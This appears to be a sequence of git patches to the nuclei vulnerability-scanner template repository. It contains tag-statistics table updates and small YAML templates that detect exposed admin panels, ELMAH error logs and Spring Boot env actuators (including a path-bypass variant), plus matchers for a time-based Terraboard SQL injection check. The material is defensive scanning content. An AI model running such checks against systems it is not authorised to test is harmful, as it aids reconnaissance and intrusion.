| | | | +| dotclear | 1 | | | | | | | | | +| spartacus | 1 | | | | | | | | | +| encompass | 1 | | | | | | | | | +| smf | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| wp-cli | 1 | | | | | | | | | +| lacie | 1 | | | | | | | | | +| restler | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| usc-e-shop | 1 | | | | | | | | | +| phpsec | 1 | | | | | | | | | +| workspace | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| gemweb | 1 | | | | | | | | | +| zeppelin | 1 | | | | | | | | | +| event | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| antsword | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| nozomi | 1 | | | | | | | | | +| apigee | 1 | | | | | | | | | +| rollupjs | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| bravenewcoin | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| ebird | 1 | | | | | | | | | +| tufin | 1 | | | | | | | | | +| cron | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| mongoose | 1 | | | | | | | | | +| shell | 1 | | | | | | | | | +| mailwatch | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| mapbox | 1 | | | | | | | | | +| hue | 1 | | | | | | | | | +| h-sphere | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| edgemax | 1 | | | | | | | | | +| web-dispatcher | 1 | | | | | | | | | +| airnotifier | 1 | | | | | | | | | +| qizhi | 1 | | | | | | | | | +| serverstatus | 1 | | | | | | | | | +| fortiproxy | 1 | | | | | | | | | +| onkyo | 1 | | | | | | | | | +| hivemanager | 1 | | | | | | | | | +| opennms | 1 | | | | | | | | | +| phpwind | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| deluge | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| easyappointments | 1 | | | | | | | | | +| fontawesome | 1 | | | | | | | | | +| malshare | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| scrapestack | 1 | | | | | | | | | +| pghero | 1 | | | | | | | | | +| pypicloud | 1 | | | | | | | | | +| joget | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| behat | 1 | | | | | | | | | +| totolink | 1 | | | | | | | | | +| xamr | 1 | | | | | | | | | +| roundcube | 1 | | | | | | | | | +| currencyfreaks | 1 | | | | | | | | | +| labstack | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| gallery | 1 | | | | | | | | | +| cnvd2017 | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| fullhunt | 1 | | | | | | | | | +| phpminiadmin | 1 | | | | | | | | | +| wget | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| tembosocial | 1 | | | | | | | | | +| osquery | 1 | | | | | | | | | +| ecsimagingpacs | 1 | | | | | | | | | +| connect | 1 | | | | | | | | | +| tiny | 1 | | | | | | | | | +| chronoforums | 1 | | | | | | | | | +| mdm | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| employment | 1 | | | | | | | | | +| zblog | 1 | | | | | | | | | +| iconfinder | 1 | | | | | | | | | +| teltonika | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| mozilla | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| fortiap | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| parse | 1 | | | | | | | | | +| patreon | 1 | | | | | | | | | +| zoomeye | 1 | | | | | | | | | +| e-mobile | 1 | | | | | | | | | +| sassy | 1 | | | | | | | | | +| rsa | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| franklinfueling | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| binaryedge | 1 | | | | | | | | | +| festivo | 1 | | | | | | | | | +| defectdojo | 1 | | | | | | | | | +| currencylayer | 1 | | | | | | | | | +| alquist | 1 | | | | | | | | | +| micro-user-service | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| archibus | 1 | | | | | | | | | +| vagrant | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| pendo | 1 | | | | | | | | | +| buttercms | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| hydra | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| phpmemcached | 1 | | | | | | | | | +| juniper | 1 | | | | | | | | | +| struts2 | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| iucn | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| dbt | 1 | | | | | | | | | +| mailboxvalidator | 1 | | | | | | | | | +| 1forge | 1 | | | | | | | | | +| arris | 1 | | | | | | | | | +| getgrav | 1 | | | | | | | | | +| docebo | 1 | | | | | | | | | +| containers | 1 | | | | | | | | | +| novius | 1 | | | | | | | | | +| anycomment | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| bhagavadgita | 1 | | | | | | | | | +| tooljet | 1 | | | | | | | | | +| mcloud | 1 | | | | | | | | | +| management | 1 | | | | | | | | | +| intellislot | 1 | | | | | | | | | +| zenrows | 1 | | | | | | | | | +| twig | 1 | | | | | | | | | +| catfishcms | 1 | | | | | | | | | +| spinnaker | 1 | | | | | | | | | +| gnuboard5 | 1 | | | | | | | | | +| tablereservation | 1 | | | | | | | | | +| i3geo | 1 | | | | | | | | | +| onelogin | 1 | | | | | | | | | +| intouch | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| mappress | 1 | | | | | | | | | +| fortressaircraft | 1 | | | | | | | | | +| openpagerank | 1 | | | | | | | | | +| webpconverter | 1 | | | | | | | | | +| agentejo | 1 | | | | | | | | | +| simply-schedule-appointments | 1 | | | | | | | | | +| googlemaps | 1 | | | | | | | | | +| cybrotech | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| siteminder | 1 | | | | | | | | | +| librenms | 1 | | | | | | | | | +| cuteeditor | 1 | | | | | | | | | +| acunetix | 1 | | | | | | | | | +| browshot | 1 | | | | | | | | | +| ind780 | 1 | | | | | | | | | +| kodi | 1 | | | | | | | | | +| loancms | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| powerjob | 1 | | | | | | | | | +| tianqing | 1 | | | | | | | | | +| accuweather | 1 | | | | | | | | | +| retool | 1 | | | | | | | | | +| niagara | 1 | | | | | | | | | +| goip | 1 | | | | | | | | | +| icc-pro | 1 | | | | | | | | | +| yishaadmin | 1 | | | | | | | | | +| contentify | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| www-xml-sitemap-generator-org | 1 | | | | | | | | | +| thinkserver | 1 | | | | | | | | | +| filr | 1 | | | | | | | | | +| ipvpn | 1 | | | | | | | | | +| zentral | 1 | | | | | | | | | +| chuangtian | 1 | | | | | | | | | +| avatier | 1 | | | | | | | | | +| incapptic-connect | 1 | | | | | | | | | +| cryptocurrencies | 1 | | | | | | | | | +| api2convert | 1 | | | | | | | | | +| europeana | 1 | | | | | | | | | +| sitemap | 1 | | | | | | | | | +| scrapingant | 1 | | | | | | | | | +| rijksmuseum | 1 | | | | | | | | | +| sicom | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| system | 1 | | | | | | | | | +| homeautomation | 1 | | | | | | | | | +| bing | 1 | | | | | | | | | +| zipkin | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| routeros | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| sterling | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| termtalk | 1 | | | | | | | | | +| zoneminder | 1 | | | | | | | | | +| nuget | 1 | | | | | | | | | +| huemagic | 1 | | | | | | | | | +| smartsheet | 1 | | | | | | | | | +| aquasec | 1 | | | | | | | | | +| objectinjection | 1 | | | | | | | | | +| aniapi | 1 | | | | | | | | | +| gofile | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| awin | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| sponip | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| secnet | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| superwebmailer | 1 | | | | | | | | | +| pandorafms | 1 | | | | | | | | | +| quip | 1 | | | | | | | | | +| monitoring | 1 | | | | | | | | | +| woody | 1 | | | | | | | | | +| rackup | 1 | | | | | | | | | +| pkp-lib | 1 | | | | | | | | | +| patreon-connect | 1 | | | | | | | | | +| remedy | 1 | | | | | | | | | +| gopher | 1 | | | | | | | | | +| vercel | 1 | | | | | | | | | +| maestro | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| synapse | 1 | | | | | | | | | +| holidayapi | 1 | | | | | | | | | +| eibiz | 1 | | | | | | | | | +| tinymce | 1 | | | | | | | | | +| caa | 1 | | | | | | | | | +| timezone | 1 | | | | | | | | | +| chaos | 1 | | | | | | | | | +| mobile | 1 | | | | | | | | | +| barracuda | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| codestats | 1 | | | | | | | | | +| leanix | 1 | | | | | | | | | +| wallix | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| playsms | 1 | | | | | | | | | +| checkmarx | 1 | | | | | | | | | +| maximo | 1 | | | | | | | | | +| spiderfoot | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| zentao | 1 | | | | | | | | | +| surreal | 1 | | | | | | | | | +| ntop | 1 | | | | | | | | | +| footprints | 1 | | | | | | | | | +| novus | 1 | | | | | | | | | +| zoomsounds | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| cgit | 1 | | | | | | | | | +| smtp2go | 1 | | | | | | | | | +| accent | 1 | | | | | | | | | +| biotime | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| ait-csv | 1 | | | | | | | | | +| guard | 1 | | | | | | | | | +| jreport | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| details | 1 | | | | | | | | | +| videoxpert | 1 | | | | | | | | | +| emobile | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| vertex | 1 | | | | | | | | | +| scraperbox | 1 | | | | | | | | | +| kronos | 1 | | | | | | | | | +| webp | 1 | | | | | | | | | +| cname | 1 | | | | | | | | | +| dvdFab | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| orbintelligence | 1 | | | | | | | | | +| zebra | 1 | | | | | | | | | +| musicstore | 1 | | | | | | | | | +| ipanel | 1 | | | | | | | | | +| gira | 1 | | | | | | | | | +| liquibase | 1 | | | | | | | | | +| blackbox | 1 | | | | | | | | | +| pelco | 1 | | | | | | | | | +| raspap | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| wordpress-country-selector | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| turbo | 1 | | | | | | | | | +| mastodon | 1 | | | | | | | | | +| satellian | 1 | | | | | | | | | +| bigfix | 1 | | | | | | | | | +| activecollab | 1 | | | | | | | | | +| nytimes | 1 | | | | | | | | | +| stored | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| cve2004 | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| notebook | 1 | | | | | | | | | +| olt | 1 | | | | | | | | | +| edgeos | 1 | | | | | | | | | +| opencart | 1 | | | | | | | | | +| bonita | 1 | | | | | | | | | +| oam | 1 | | | | | | | | | +| m-files | 1 | | | | | | | | | +| bitrise | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| suitecrm | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| jinfornet | 1 | | | | | | | | | +| dotnetcms | 1 | | | | | | | | | +| nvrsolo | 1 | | | | | | | | | +| pyproject | 1 | | | | | | | | | +| proxykingdom | 1 | | | | | | | | | +| oauth2 | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| np | 1 | | | | | | | | | +| metform | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| scrapingdog | 1 | | | | | | | | | +| stats | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| ictprotege | 1 | | | | | | | | | +| purestorage | 1 | | | | | | | | | +| ignition | 1 | | | | | | | | | +| revive | 1 | | | | | | | | | +| prexview | 1 | | | | | | | | | +| prestahome | 1 | | | | | | | | | +| binance | 1 | | | | | | | | | +| argocd | 1 | | | | | | | | | +| jgraph | 1 | | | | | | | | | +| omni | 1 | | | | | | | | | +| zzzphp | 1 | | | | | | | | | +| airtable | 1 | | | | | | | | | +| neobox | 1 | | | | | | | | | +| sogo | 1 | | | | | | | | | +| slstudio | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| narnoo-distributor | 1 | | | | | | | | | +| flask | 1 | | | | | | | | | +| phpMyChat | 1 | | | | | | | | | +| blitapp | 1 | | | | | | | | | +| istat | 1 | | | | | | | | | +| directum | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| jabber | 1 | | | | | | | | | +| snipeit | 1 | | | | | | | | | +| mirasys | 1 | | | | | | | | | +| suprema | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| cloudconvert | 1 | | | | | | | | | +| adafruit | 1 | | | | | | | | | +| themefusion | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| qualtrics | 1 | | | | | | | | | +| muhttpd | 1 | | | | | | | | | +| trello | 1 | | | | | | | | | +| pieregister | 1 | | | | | | | | | +| pane | 1 | | | | | | | | | +| eventtickets | 1 | | | | | | | | | +| open-school | 1 | | | | | | | | | +| youtube | 1 | | | | | | | | | +| dwsync | 1 | | | | | | | | | +| arprice-responsive-pricing-table | 1 | | | | | | | | | +| mkdocs | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 98bf44a85e..e91f5c2085 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1526 | dhiyaneshdk | 687 | cves | 1504 | info | 1618 | http | 4218 | -| panel | 747 | daffainfo | 659 | exposed-panels | 751 | high | 1135 | file | 77 | -| edb | 575 | pikpikcu | 340 | vulnerabilities | 517 | medium | 822 | network | 70 | -| xss | 533 | pdteam | 274 | misconfiguration | 338 | critical | 540 | dns | 17 | -| exposure | 525 | geeknik | 196 | technologies | 306 | low | 260 | | | -| lfi | 518 | dwisiswant0 | 171 | exposures | 300 | unknown | 23 | | | -| wordpress | 460 | 0x_akoko | 169 | token-spray | 235 | | | | | -| cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | | -| wp-plugin | 355 | pussycat0x | 157 | default-logins | 113 | | | | | -| rce | 343 | princechaddha | 153 | file | 77 | | | | | +| cve | 1538 | dhiyaneshdk | 692 | cves | 1516 | info | 1631 | http | 4257 | +| panel | 755 | daffainfo | 662 | exposed-panels | 757 | high | 1141 | file | 78 | +| edb | 578 | pikpikcu | 340 | vulnerabilities | 518 | medium | 829 | network | 73 | +| xss | 537 | pdteam | 274 | misconfiguration | 350 | critical | 546 | dns | 17 | +| exposure | 536 | geeknik | 197 | technologies | 311 | low | 269 | | | +| lfi | 519 | dwisiswant0 | 171 | exposures | 301 | unknown | 25 | | | +| wordpress | 465 | 0x_akoko | 170 | token-spray | 235 | | | | | +| cve2021 | 366 | pussycat0x | 168 | workflows | 190 | | | | | +| wp-plugin | 360 | ritikchaddha | 161 | default-logins | 114 | | | | | +| tech | 349 | princechaddha | 153 | file | 78 | | | | | From 43e1737ffd9d27e1e49baccae620f4d06afb87a0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 21 Nov 2022 06:53:03 +0000 Subject: [PATCH 0497/1415] Auto README Update [Mon Nov 21 06:53:03 UTC 2022] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index cdb1e8244e..2ac124b44d 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1526 | dhiyaneshdk | 687 | cves | 1504 | info | 1618 | http | 4218 | -| panel | 747 | daffainfo | 659 | exposed-panels | 751 | high | 1135 | file | 77 | -| edb | 575 | pikpikcu | 340 | vulnerabilities | 517 | medium | 822 | network | 70 | -| xss | 533 | pdteam | 274 | misconfiguration | 338 | critical | 540 | dns | 17 | -| exposure | 525 | geeknik | 196 | technologies | 306 | low | 260 | | | -| lfi | 518 | dwisiswant0 | 171 | exposures | 300 | unknown | 23 | | | -| wordpress | 460 | 0x_akoko | 169 | token-spray | 235 | | | | | -| cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | | -| wp-plugin | 355 | pussycat0x | 157 | default-logins | 113 | | | | | -| rce | 343 | princechaddha | 153 | file | 77 | | | | | +| cve | 1538 | dhiyaneshdk | 692 | cves | 1516 | info | 1631 | http | 4257 | +| panel | 755 | daffainfo | 662 | exposed-panels | 757 | high | 1141 | file | 78 | +| edb | 578 | pikpikcu | 340 | vulnerabilities | 518 | medium | 829 | network | 73 | +| xss | 537 | pdteam | 274 | misconfiguration | 350 | critical | 546 | dns | 17 | +| exposure | 536 | geeknik | 197 | technologies | 311 | low | 269 | | | +| lfi | 519 | dwisiswant0 | 171 | exposures | 301 | unknown | 25 | | | +| wordpress | 465 | 0x_akoko | 170 | token-spray | 235 | | | | | +| cve2021 | 366 | pussycat0x | 168 | workflows | 190 | | | | | +| wp-plugin | 360 | ritikchaddha | 161 | default-logins | 114 | | | | | +| tech | 349 | princechaddha | 153 | file | 78 | | | | | -**312 directories, 4617 files**. +**314 directories, 4660 files**. From fad41032af4af9d9428e3f37767e0482bcd27f72 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 21 Nov 2022 13:58:22 +0700 Subject: [PATCH 0498/1415] Create fastpanel-hosting-control-panel.yaml --- .../fastpanel-hosting-control-panel.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/fastpanel-hosting-control-panel.yaml diff --git a/exposed-panels/fastpanel-hosting-control-panel.yaml b/exposed-panels/fastpanel-hosting-control-panel.yaml new file mode 100644 index 0000000000..606cca8751 --- /dev/null +++ b/exposed-panels/fastpanel-hosting-control-panel.yaml @@ -0,0 +1,24 @@ +id: fastpanel-hosting-control-panel + +info: + name: Fastpanel Hosting Control Panel + author: pikpikcu + severity: info + tags: tech,fastpanel,login + +requests: + - method: GET + path: + - "{{BaseURL}}:8888/#/login" + - "{{BaseURL}}/#/login" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "FASTPANEL HOSTING CONTROL" From 9610e7f8033d8eeac047c0c6a8a23a1711b4981f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 21 Nov 2022 12:31:27 +0530 Subject: [PATCH 0499/1415] Update fastpanel-hosting-control-panel.yaml --- .../fastpanel-hosting-control-panel.yaml | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/exposed-panels/fastpanel-hosting-control-panel.yaml b/exposed-panels/fastpanel-hosting-control-panel.yaml index 606cca8751..8ab9b452b8 100644 --- a/exposed-panels/fastpanel-hosting-control-panel.yaml +++ b/exposed-panels/fastpanel-hosting-control-panel.yaml @@ -4,21 +4,20 @@ info: name: Fastpanel Hosting Control Panel author: pikpikcu severity: info - tags: tech,fastpanel,login + tags: panel,fastpanel requests: - method: GET path: - - "{{BaseURL}}:8888/#/login" - - "{{BaseURL}}/#/login" + - "{{BaseURL}}/authentication" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: - - "FASTPANEL HOSTING CONTROL" + - "FASTPANEL HOSTING CONTROL" + + - type: status + status: + - 200 From a24abbbc122d59687a1bc888fc089ff04769715a Mon Sep 17 00:00:00 2001 From: idealphase Date: Mon, 21 Nov 2022 14:09:24 +0700 Subject: [PATCH 0500/1415] Updated elmah-log-file.yaml Updated redirect, description and reference --- exposures/logs/elmah-log-file.yaml | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/exposures/logs/elmah-log-file.yaml b/exposures/logs/elmah-log-file.yaml index 7d4a53f33c..f8c711bf19 100644 --- a/exposures/logs/elmah-log-file.yaml +++ b/exposures/logs/elmah-log-file.yaml @@ -2,15 +2,24 @@ id: elmah-log-file info: name: elmah.axd Disclosure - author: shine + author: shine, idealphase severity: medium + description: | + ELMAH (Error Logging Modules and Handlers) is an application-wide error logging facility that is completely pluggable. It can be dynamically added to a running ASP.NET web application, or even all ASP.NET web applications on a machine, without any need for re-compilation or re-deployment. + reference: + - https://code.google.com/archive/p/elmah/ + - https://www.troyhunt.com/aspnet-session-hijacking-with-google/ tags: logs,exposure requests: - method: GET path: - "{{BaseURL}}/elmah.axd" + - "{{BaseURL}}/elmah" + stop-at-first-match: true + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: @@ -20,4 +29,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 5a8d44af76fe129b4ba58fc8bb13ca06888b116b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 21 Nov 2022 12:40:08 +0530 Subject: [PATCH 0501/1415] Update fastpanel-hosting-control-panel.yaml --- exposed-panels/fastpanel-hosting-control-panel.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposed-panels/fastpanel-hosting-control-panel.yaml b/exposed-panels/fastpanel-hosting-control-panel.yaml index 8ab9b452b8..6eead36a19 100644 --- a/exposed-panels/fastpanel-hosting-control-panel.yaml +++ b/exposed-panels/fastpanel-hosting-control-panel.yaml @@ -4,6 +4,9 @@ info: name: Fastpanel Hosting Control Panel author: pikpikcu severity: info + metadata: + verified: "true" + shodan-query: title:"FASTPANEL HOSTING CONTROL" tags: panel,fastpanel requests: From 1082485b6839b46fbd9fa212d85b6aa688f32d3c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 21 Nov 2022 15:05:42 +0530 Subject: [PATCH 0502/1415] Update springboot-env.yaml --- misconfiguration/springboot/springboot-env.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/misconfiguration/springboot/springboot-env.yaml b/misconfiguration/springboot/springboot-env.yaml index a13d6f7bc0..cf035005ba 100644 --- a/misconfiguration/springboot/springboot-env.yaml +++ b/misconfiguration/springboot/springboot-env.yaml @@ -12,6 +12,7 @@ requests: path: - "{{BaseURL}}/env" - "{{BaseURL}}/actuator/env" + - "{{BaseURL}}/actuator;/env;" stop-at-first-match: true matchers-condition: and From b9d46ab389d6ce5151ac025ddf73e92c5b309f5a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 21 Nov 2022 15:07:43 +0530 Subject: [PATCH 0503/1415] Update springboot-env.yaml --- misconfiguration/springboot/springboot-env.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/springboot/springboot-env.yaml b/misconfiguration/springboot/springboot-env.yaml index cf035005ba..fd56787194 100644 --- a/misconfiguration/springboot/springboot-env.yaml +++ b/misconfiguration/springboot/springboot-env.yaml @@ -2,7 +2,7 @@ id: springboot-env info: name: Detect Springboot Env Actuator - author: that_juan_,dwisiswant0,wdahlenb,philippedelteil + author: that_juan_,dwisiswant0,wdahlenb,philippedelteil,stupidfish severity: low description: Sensitive environment variables may not be masked tags: springboot,exposure From 151bc712fbf40aad5ba1b6b0175055d43d712992 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 21 Nov 2022 15:19:31 +0530 Subject: [PATCH 0504/1415] Update fastpanel-hosting-control-panel.yaml --- exposed-panels/fastpanel-hosting-control-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/fastpanel-hosting-control-panel.yaml b/exposed-panels/fastpanel-hosting-control-panel.yaml index 6eead36a19..6f30946ac4 100644 --- a/exposed-panels/fastpanel-hosting-control-panel.yaml +++ b/exposed-panels/fastpanel-hosting-control-panel.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: info metadata: - verified: "true" + verified: true shodan-query: title:"FASTPANEL HOSTING CONTROL" tags: panel,fastpanel From cf0cb7decd4cc53d439eb5daa7f40e7e35ba9f8b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 21 Nov 2022 09:56:55 +0000 Subject: [PATCH 0505/1415] Auto Generated New Template Addition List [Mon Nov 21 09:56:54 UTC 2022] :robot: --- .new-additions | 46 +--------------------------------------------- 1 file changed, 1 insertion(+), 45 deletions(-) diff --git a/.new-additions b/.new-additions index aca87dc670..0969d877de 100644 --- a/.new-additions +++ b/.new-additions @@ -1,45 +1 @@ -cves/2020/CVE-2020-13121.yaml -cves/2020/CVE-2020-21012.yaml -cves/2020/CVE-2020-24902.yaml -cves/2020/CVE-2020-24903.yaml -cves/2020/CVE-2020-29284.yaml -cves/2021/CVE-2021-43510.yaml -cves/2022/CVE-2022-0349.yaml -cves/2022/CVE-2022-1442.yaml -cves/2022/CVE-2022-2379.yaml -cves/2022/CVE-2022-3484.yaml -cves/2022/CVE-2022-3578.yaml -cves/2022/CVE-2022-40881.yaml -default-logins/tooljet/tooljet-default-login.yaml -exposed-panels/apache-jmeter-dashboard.yaml -exposed-panels/np-data-cache.yaml -exposed-panels/opencpu-panel.yaml -exposed-panels/selenium-grid.yaml -exposed-panels/tekton-dashboard.yaml -exposed-panels/wagtail-cms-detect.yaml -exposed-panels/xibocms-login.yaml -exposures/files/apache-licenserc.yaml -file/keys/github-recovery-code.yaml -iot/pqube-power-analyzers.yaml -misconfiguration/blackbox-exporter-metrics.yaml -misconfiguration/bootstrap-admin-panel-template.yaml -misconfiguration/docmosis-tornado-server.yaml -misconfiguration/haproxy-exporter-metrics.yaml -misconfiguration/installer/tasmota-install.yaml -misconfiguration/mongodb-exporter-metrics.yaml -misconfiguration/pcdn-cache-node.yaml -misconfiguration/phpmemcached-admin-panel.yaml -misconfiguration/tasmota-config-webui.yaml -misconfiguration/typo3-debug-mode.yaml -misconfiguration/unauth-mercurial.yaml -misconfiguration/unauth-selenium-grid-console.yaml -network/detection/dotnet-remoting-service-detect.yaml -network/detection/esmtp-detect.yaml -network/detection/imap-detect.yaml -network/detection/pop3-detect.yaml -network/detection/telnet-detect.yaml -technologies/notion-detect.yaml -technologies/secui-waf-detect.yaml -technologies/sogo-detect.yaml -technologies/tornado-server-login.yaml -vulnerabilities/opencpu/opencpu-rce.yaml +exposed-panels/fastpanel-hosting-control-panel.yaml From 92bc57c7f5dcfa5350c900d31d7422ddd0903bb1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 21 Nov 2022 15:28:48 +0530 Subject: [PATCH 0506/1415] Update CVE-2022-1883.yaml --- cves/2022/CVE-2022-1883.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-1883.yaml b/cves/2022/CVE-2022-1883.yaml index 8c86818b40..b8170334ee 100644 --- a/cves/2022/CVE-2022-1883.yaml +++ b/cves/2022/CVE-2022-1883.yaml @@ -1,7 +1,7 @@ id: CVE-2022-1883 info: - name: camptocamp/terraboard < 2.2.0 - SQL Injection + name: Terraboard < 2.2.0 - SQL Injection author: edoardottt severity: critical description: | @@ -11,7 +11,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-1883 classification: cve-id: CVE-2022-1883 - tags: cve,terraboard,cve2022,sqli + tags: cve,cve2022,terraboard,sqli requests: - raw: @@ -26,6 +26,13 @@ requests: dsl: - 'duration>=5' + - type: word + part: body + words: + - '"page":' + - '"results":' + condition: and + - type: status status: - - 200 \ No newline at end of file + - 200 From 7cc483f155fb81331c4f6fa5cab45304603cb828 Mon Sep 17 00:00:00 2001 From: karanjasj2 <58425489+karanjasj2@users.noreply.github.com> Date: Mon, 21 Nov 2022 16:10:20 +0530 Subject: [PATCH 0507/1415] Create mach-proweb-login.yaml --- exposed-panels/mach-proweb-login.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposed-panels/mach-proweb-login.yaml diff --git a/exposed-panels/mach-proweb-login.yaml b/exposed-panels/mach-proweb-login.yaml new file mode 100644 index 0000000000..1b421e3eb2 --- /dev/null +++ b/exposed-panels/mach-proweb-login.yaml @@ -0,0 +1,27 @@ +id: mach-proweb-login + +info: + name: MACH-ProWeb Login panel + author: Jaskaran + severity: info + description: MACH-ProWeb is building controller system used to access and control respective facilities easily + reference: + - https://www.exploit-db.com/ghdb/8023 + metadata: + google-query: intitle:"Log on to MACH-ProWeb" + tags: panel,mach-proweb + +requests: + - method: GET + path: + - '{{BaseURL}}/login.html' + + matchers-condition: and + matchers: + - type: regex + regex: + - 'Log on to MACH-ProWeb' + + - type: status + status: 